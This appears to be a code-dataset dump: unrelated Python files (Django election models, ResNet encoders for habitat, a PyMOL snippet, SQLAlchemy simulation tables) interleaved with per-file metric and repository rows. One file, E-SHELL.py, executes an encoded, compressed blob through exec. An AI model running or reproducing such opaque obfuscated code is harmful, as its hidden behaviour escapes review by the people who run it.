db_table = 'voter_turnout'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)
class Voteshares_Cont(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
partyvotes = models.IntegerField(blank=True, null=True)
totalvotes = models.IntegerField(blank=True, null=True)
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'voteshares_cont'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Voteshares_Total(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Party = models.CharField(db_column='Party', max_length=50) # Field name made lowercase.
Vote_Share_Percentage = models.DecimalField(db_column='Vote_Share_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
Position = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'voteshares_total'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No', 'Party'),)
class Womens(models.Model):
Election_Type = models.CharField(db_column='Election_Type', primary_key=True, max_length=2) # Field name made lowercase.
State_Name = models.CharField(db_column='State_Name', max_length=50) # Field name made lowercase.
Assembly_No = models.IntegerField(db_column='Assembly_No') # Field name made lowercase.
Year = models.IntegerField(db_column='Year') # Field name made lowercase.
Women_Percentage = models.DecimalField(db_column='Women_Percentage', max_digits=4, decimal_places=2, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'womens'
unique_together = (('Election_Type', 'State_Name', 'Assembly_No'),)
| 74.64794
| 183
| 0.746375
| 2,683
| 19,931
| 5.333582
| 0.062244
| 0.07659
| 0.124458
| 0.210622
| 0.893571
| 0.839902
| 0.819078
| 0.801328
| 0.787282
| 0.762264
| 0
| 0.009784
| 0.143646
| 19,931
| 266
| 184
| 74.928571
| 0.828627
| 0.209172
| 0
| 0.6
| 1
| 0
| 0.14068
| 0.017737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004545
| 0
| 0.827273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
7b10ce1380102a8b4a1268e759d954ab7aaf7c93
| 73
|
py
|
Python
|
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
chimera/auth/__init__.py
|
sjklein92/senior-design
|
52d11e5c5fa45397b4e873bdc070f9caa28c0baa
|
[
"MIT"
] | null | null | null |
from chimera.auth.models import *
from chimera.auth.controllers import *
| 24.333333
| 38
| 0.808219
| 10
| 73
| 5.9
| 0.6
| 0.372881
| 0.508475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 39
| 36.5
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9e7859334876ad8a7a0f722113f3f464813ded77
| 263
|
py
|
Python
|
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | 1
|
2020-01-13T23:27:16.000Z
|
2020-01-13T23:27:16.000Z
|
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
bluedaemondev/employees_objective
|
385390b18fedeeb56ba75b2ecdca295f4cca0bc5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# EYNES Ing. de Software @2019 (Juan Lanosa). See LICENSE file for full copyright and licensing details.
from . import employee_objective
#from . import employee_objective_panel
#from . import sale_order
#from . import objective_worklog
| 29.222222
| 104
| 0.760456
| 36
| 263
| 5.416667
| 0.75
| 0.205128
| 0.184615
| 0.276923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022422
| 0.152091
| 263
| 8
| 105
| 32.875
| 0.852018
| 0.825095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7b3fb3f881829612fabc73ac3b90bcc61e35e476
| 203
|
py
|
Python
|
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
Workshop/internalGUIwidth.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: Set the width of the internal gui. Set to 0 to make the internal gui vanish.
# Source: placeHolder
"""
cmd.do('set internal_gui_width=${1:0};')
"""
cmd.do('set internal_gui_width=0;')
| 22.555556
| 92
| 0.699507
| 34
| 203
| 4.058824
| 0.470588
| 0.318841
| 0.202899
| 0.231884
| 0.347826
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.152709
| 203
| 8
| 93
| 25.375
| 0.77907
| 0.753695
| 0
| 0
| 0
| 0
| 0.609756
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b518d3b6a495cd841af4342353601ef1b627e21
| 13,108
|
py
|
Python
|
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
habitat_baselines/il/common/encoders/resnet_encoders.py
|
Ram81/habitat-imitation-baselines
|
c6e11c8ebadbf1260e1bed58a5b8dfb7faf6a505
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
from gym import spaces
from habitat import logger
from habitat_baselines.utils.common import Flatten
from habitat_baselines.rl.ddppo.policy import resnet
from habitat_baselines.rl.ddppo.policy.resnet_policy import ResNetEncoder
class VlnResnetDepthEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=128,
checkpoint="NONE",
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
):
super().__init__()
self.visual_encoder = ResNetEncoder(
spaces.Dict({"depth": observation_space.spaces["depth"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
if checkpoint != "NONE":
ddppo_weights = torch.load(checkpoint)
weights_dict = {}
for k, v in ddppo_weights["state_dict"].items():
split_layer_name = k.split(".")[2:]
if split_layer_name[0] != "visual_encoder":
continue
layer_name = ".".join(split_layer_name[1:])
weights_dict[layer_name] = v
del ddppo_weights
self.visual_encoder.load_state_dict(weights_dict, strict=True)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_depth = observations["depth"]
if len(obs_depth.size()) == 5:
observations["depth"] = obs_depth.contiguous().view(
-1, obs_depth.size(2), obs_depth.size(3), obs_depth.size(4)
)
if "depth_features" in observations:
x = observations["depth_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetRGBEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
):
super().__init__()
backbone_split = backbone.split("_")
logger.info("backbone: {}".format(backbone_split))
make_backbone = getattr(resnet, backbone_split[0])
self.visual_encoder = ResNetEncoder(
spaces.Dict({"rgb": observation_space.spaces["rgb"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=make_backbone,
normalize_visual_inputs=normalize_visual_inputs,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
@property
def is_blind(self):
return self._n_input_rgb == 0
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_rgb = observations["rgb"]
if len(obs_rgb.size()) == 5:
observations["rgb"] = obs_rgb.contiguous().view(
-1, obs_rgb.size(2), obs_rgb.size(3), obs_rgb.size(4)
)
if "rgb_features" in observations:
x = observations["rgb_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetSemSeqEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
backbone="resnet18",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=False,
spatial_output: bool = False,
semantic_embedding_size=4,
use_pred_semantics=False,
use_goal_seg=False,
is_thda=False,
):
super().__init__()
if not use_goal_seg:
sem_input_size = 40 + 2
self.semantic_embedder = nn.Embedding(sem_input_size, semantic_embedding_size)
self.visual_encoder = ResNetEncoder(
spaces.Dict({"semantic": observation_space.spaces["semantic"]}),
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
sem_embedding_size=semantic_embedding_size,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
self.spatial_output = spatial_output
self.use_goal_seg = use_goal_seg
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
@property
def is_blind(self):
return self._n_input_rgb == 0
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_semantic = observations["semantic"]
if len(obs_semantic.size()) == 5:
observations["semantic"] = obs_semantic.contiguous().view(
-1, obs_semantic.size(2), obs_semantic.size(3), obs_semantic.size(4)
)
if "semantic_features" in observations:
x = observations["semantic_features"]
else:
# Embed input when using all object categories
if not self.use_goal_seg:
categories = observations["semantic"].long() + 1
observations["semantic"] = self.semantic_embedder(categories)
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
class ResnetEncoder(nn.Module):
def __init__(
self,
observation_space,
output_size=256,
checkpoint="NONE",
backbone="resnet50",
resnet_baseplanes=32,
normalize_visual_inputs=False,
trainable=True,
spatial_output: bool = False,
sem_embedding_size=4,
):
super().__init__()
self.visual_encoder = ResNetEncoder(
observation_space,
baseplanes=resnet_baseplanes,
ngroups=resnet_baseplanes // 2,
make_backbone=getattr(resnet, backbone),
normalize_visual_inputs=normalize_visual_inputs,
sem_embedding_size=sem_embedding_size,
)
for param in self.visual_encoder.parameters():
param.requires_grad_(trainable)
self.spatial_output = spatial_output
if not self.spatial_output:
self.output_shape = (output_size,)
self.visual_fc = nn.Sequential(
Flatten(),
nn.Linear(np.prod(self.visual_encoder.output_shape), output_size),
nn.ReLU(True),
)
else:
self.spatial_embeddings = nn.Embedding(
self.visual_encoder.output_shape[1]
* self.visual_encoder.output_shape[2],
64,
)
self.output_shape = list(self.visual_encoder.output_shape)
self.output_shape[0] += self.spatial_embeddings.embedding_dim
self.output_shape = tuple(self.output_shape)
def forward(self, observations):
"""
Args:
observations: [BATCH, HEIGHT, WIDTH, CHANNEL]
Returns:
[BATCH, OUTPUT_SIZE]
"""
obs_rgb = observations["rgb"]
if len(obs_rgb.size()) == 5:
observations["rgb"] = obs_rgb.contiguous().view(
-1, obs_rgb.size(2), obs_rgb.size(3), obs_rgb.size(4)
)
obs_depth = observations["depth"]
if len(obs_rgb.size()) == 5:
observations["depth"] = obs_depth.contiguous().view(
-1, obs_depth.size(2), obs_depth.size(3), obs_depth.size(4)
)
obs_semantic = observations["semantic"]
if len(obs_rgb.size()) == 5:
observations["semantic"] = obs_semantic.contiguous().view(
-1, obs_semantic.size(2), obs_semantic.size(3), obs_semantic.size(4)
)
if "rgb_features" in observations:
x = observations["rgb_features"]
else:
x = self.visual_encoder(observations)
if self.spatial_output:
b, c, h, w = x.size()
spatial_features = (
self.spatial_embeddings(
torch.arange(
0,
self.spatial_embeddings.num_embeddings,
device=x.device,
dtype=torch.long,
)
)
.view(1, -1, h, w)
.expand(b, self.spatial_embeddings.embedding_dim, h, w)
)
return torch.cat([x, spatial_features], dim=1)
else:
return self.visual_fc(x)
| 33.269036
| 90
| 0.553326
| 1,343
| 13,108
| 5.139985
| 0.11169
| 0.0536
| 0.071418
| 0.05331
| 0.824569
| 0.809648
| 0.777053
| 0.756193
| 0.756193
| 0.740692
| 0
| 0.012924
| 0.350702
| 13,108
| 393
| 91
| 33.35369
| 0.798144
| 0.030897
| 0
| 0.731013
| 0
| 0
| 0.024373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031646
| false
| 0
| 0.031646
| 0.006329
| 0.107595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7b8777fb3b666de80d59f2e24fb98ba5f700da5d
| 1,510
|
py
|
Python
|
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
E-SHELL.py
|
mrkeok/encryptSHELL
|
f20d3657d76f318e762d37a1f5aa5952a2571664
|
[
"Apache-2.0"
] | null | null | null |
import zlib,base64
exec(zlib.decompress(base64.b64decode("eJzFV+uO2kYU/j9PceL+MLSB5RL1QrOrlg3ZrjbdRASJrraraIAhWOCLfFGCACk/869bqSukSEhRkZB4gj5A34Qn6ZnxeLANVtLuJjVjc+Y7lznnzJzx+AsofFmArt0zrJc1CPx+4VuOEGKYju36YHsR5Y0V2TdGzLCcwI8A3zBZRLvU6tkmIedwCPqvpWr1smTq5JHqfce7bdUtf1/9BoF6HHiAQDMOlBE4iQMVBC7iQBWB4zjwNQKEekPE6vAV6Jc6Ptuc2sx/47RAr0AnXjD0mIdyJym5t+84fRLJMdd2UaqZlLrHKYFd4YCkQy2LuSU41DSNTGabm/ebm+vNzUo8l7C5+UNQ16n+nFOQko4Jz5OSSTPXBGAKoNSXgv5d3YIbMeWwijtVnDnhUmuh/C7l5UJhC5BS6pHgJlUXaFJdPBt7ApKd1ZbaxhoRK+WgumIDzUX0YRwr7s02JvR2mqG1SHfWor+QMa1D8TVO4sN4rj9zOyIicw8xeW/+nMyOYtmsj6EGP7svzqqlsxisRP93z7EEin3bNamfa95vi18zdrfzUblgVfFySS2ReFtG05fJ5esG5P8+seVWhBOyZLbXNE1Ot5AkpiRRRlu3dkom5dn7PfgOukwONJlNI8v7R5x+wNNkePucuI5VM0S1nBHGDmMPxFGSnYpwJWdM4ce31Q5xh20eOjnFmwb+ADf8zrimakzMyZT/D41X1KqWH5R/eGlSY1Ts2mZUf2K/ycjBx7f1DnGHbfFfp2KeVYF3rRNNA1xOZuXJ7Ao7jfPj5umzVoiHnErIaTXOWz+en8Q5Vanzy2nrdtOy+Fw66F5qv2zGdstmYudM3GoXrYSHDhnvrevsE7V55OB2f5rMPDw7Ugu8rms4PvQMcJg1FhiisUtO41Z9MjMsn7kWHR34bMQc2wKfOVTYGAXUhb496uELZkf91gX6idoi+dZs3r8Q83wh35e2V8RzuM9MyOndEaOunieOizmAcA0Q0mN9YNYQE5nL13i0vjuuRUegfeqSFbdSSYI5flTWji1NnnS1mibPxVpOk+dg7cDrdanbOwjn0AyK3kBJ5TVQ48g5PsTvhFcvxEdEjp/SpZXnIVeT53Pt8EjQ7ZSbun4LDy1qUgzUDeBDvtqBj/5l+fo05Gb7qrKd0zrUGxTsTj/wutRnQk4mAhWhYAtEDpeKNSe/T1CwztwB9fB1UyxqQoq97jK0ccbGHRtDO+W14AaOX0uZEJ8ufCRugVm+cS+hf/q04aJEptZj/N6DltGjQ3hkQIuZwZBa3AQhPh3aw0SGRP4vVdb//ktNypUCnxkjYwCWbdqu4gLPX54YfZA28VBY1gBd2PZLZU04GS1wklrTzhjf2VYFGoXnPzWePCk6Yz1lsZK2WAktZlRGvCpKWaP5zApH+tfeVNPeVENv5CqvXzQAbz1tmL02fDRF/gHXEgft")))
| 755
| 1,491
| 0.962914
| 50
| 1,510
| 29.08
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157162
| 0.001325
| 1,510
| 2
| 1,491
| 755
| 0.807029
| 0
| 0
| 0
| 0
| 0.5
| 0.958306
| 0.958306
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
7ba12f3ca69fd03d54e407511d82d5e83abbc047
| 11,746
|
py
|
Python
|
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
SBaaS_COBRA/stage02_physiology_simulatedData_postgresql_models.py
|
dmccloskey/SBaaS_COBRA
|
65635495c4fb7cc98f5c6629e495850e908ea858
|
[
"MIT"
] | null | null | null |
#SBaaS base
from SBaaS_base.postgresql_orm_base import *
class data_stage02_physiology_simulatedData_fva(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fva'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fva_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
fva_minimum = Column(Float);
fva_maximum = Column(Float);
fva_method = Column(String(100))
allow_loops = Column(Boolean);
fva_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id',
'rxn_id',
'simulation_dateAndTime',
'flux_units',
'fva_method',
'allow_loops',
'solver_id'
),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fva_maximum=row_dict_I['fva_maximum'];
self.fva_minimum=row_dict_I['fva_minimum'];
self.fva_method=row_dict_I['fva_method'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fva_options=row_dict_I['fva_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
fva_minimum_I,fva_maximum_I,fva_method_I,
allow_loops_I,
fva_options_I,
solver_id_I,flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.fva_minimum=fva_minimum_I
self.fva_maximum=fva_maximum_I
self.fva_method=fva_method_I
self.allow_loops=allow_loops_I
self.fva_options=fva_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_id,
'rxn_id':self.rxn_id,
'fva_minimum':self.fva_minimum,
'fva_maximum':self.fva_maximum,
'fva_method':self.fva_maximum,
'allow_loops':self.allow_loops,
'fva_options':self.fva_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_sra(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_sra'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_sra_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
sra_gr = Column(Float);
gr_units = Column(String(50), default = 'hr-1');
sra_gr_ratio = Column(Float);
sra_method = Column(String(100))
sra_options = Column(postgresql.JSON);
solver_id = Column(String);
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id','rxn_id','simulation_dateAndTime','gr_units','sra_method',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.gr_units=row_dict_I['gr_units'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.sra_gr_ratio=row_dict_I['sra_gr_ratio'];
self.sra_gr=row_dict_I['sra_gr'];
self.sra_method=row_dict_I['sra_method'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
sra_gr_I,
gr_units_I,
sra_gr_ratio_I,
sra_method_I,
solver_id_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.gr_units=gr_units_I
self.sra_gr=sra_gr_I
self.sra_method=sra_method_I
self.sra_gr_ratio=sra_gr_ratio_I
self.solver_id=solver_id_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_id,
'rxn_id':self.rxn_id,
'gr_units':self.gr_units,
'sra_gr':self.sra_gr,
'sra_method':self.sra_method,
'sra_gr_ratio':self.sra_gr_ratio,
'solver_id':self.solver_id,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_fbaPrimal(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fbaPrimal'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fbaPrimal_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
rxn_id = Column(String(100))
fba_flux = Column(Float);
fba_method = Column(String(100))
allow_loops = Column(Boolean);
fba_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
UniqueConstraint('simulation_id','rxn_id','simulation_dateAndTime','fba_method','flux_units',
'allow_loops',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fba_flux=row_dict_I['fba_flux'];
self.fba_method=row_dict_I['fba_method'];
self.rxn_id=row_dict_I['rxn_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fba_options=row_dict_I['fba_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
rxn_id_I,
fba_flux_I,
fba_method_I,
allow_loops_I,
fba_options_I,
solver_id_I,
flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.rxn_id=rxn_id_I
self.fba_flux=fba_flux_I
self.fba_method=fba_method_I
self.allow_loops=allow_loops_I
self.fba_options=fba_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_id,
'rxn_id':self.rxn_id,
'fba_flux':self.fba_flux,
'fba_method':self.fba_method,
'allow_loops':self.allow_loops,
'fba_options':self.fba_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
class data_stage02_physiology_simulatedData_fbaDual(Base):
__tablename__ = 'data_stage02_physiology_simulatedData_fbaDual'
id = Column(Integer, Sequence('data_stage02_physiology_simulatedData_fbaDual_id_seq'), primary_key=True)
simulation_id = Column(String(500))
simulation_dateAndTime = Column(DateTime);
met_id = Column(String(100))
fba_shadowPrice = Column(Float);
fba_method = Column(String(100))
allow_loops = Column(Boolean);
fba_options = Column(postgresql.JSON);
solver_id = Column(String);
flux_units = Column(String(50), default = 'mmol*gDW-1*hr-1');
used_ = Column(Boolean);
comment_ = Column(Text);
__table_args__ = (
